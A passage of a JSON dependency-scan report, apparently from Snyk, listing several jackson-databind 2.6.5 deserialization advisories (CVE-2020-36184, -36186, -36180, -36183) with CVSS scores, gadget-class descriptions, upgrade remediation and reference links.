- "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - 
"alternativeIds": [], - "disclosureTime": "2021-01-07T12:44:41Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:33.970819Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:23.768509Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056416", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2998", - "title": "GitHub Issue" - }, - { - "url": 
"https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-36184", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:47.820867Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.700251Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.169091Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:47.820867Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.700251Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2998)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36184)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36184" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:02:15.197495Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:00:25Z", - 
"exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:33Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:24.700251Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056417", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2997", - "title": "GitHub Issue" - }, - { - "url": 
"https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.757857Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.695573Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.214306Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.757857Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.695573Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2997)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36186" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:05:16.831143Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:00:26Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:34.206083Z", - "severityBasedOn": "CVSS", - 
"modificationTime": "2024-03-11T09:51:24.695573Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056418", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/Al1ex/CVE-2020-36179", - "title": "Al1ex's Poc" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3004", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.867743Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.705041Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.249724Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.867743Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.705041Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [Al1ex's Poc](https://github.com/Al1ex/CVE-2020-36179)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36180" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:08:29.105792Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:05:51Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": 
"2021-01-07T16:40:34Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:24.705041Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056419", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3003", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:49:18.170866Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - 
"modificationTime": "2024-03-11T09:51:23.831271Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.268380Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:18.170866Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.831271Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.docx4j.org.apache.xalan.lib.sql.JNDIConnectionPool`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3003)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36183" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:11:36.206859Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:10:25Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:34.627750Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:23.831271Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056420", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/Al1ex/CVE-2020-36179", - "title": "Al1ex's Poc" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3004", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:59.448286Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.759947Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": 
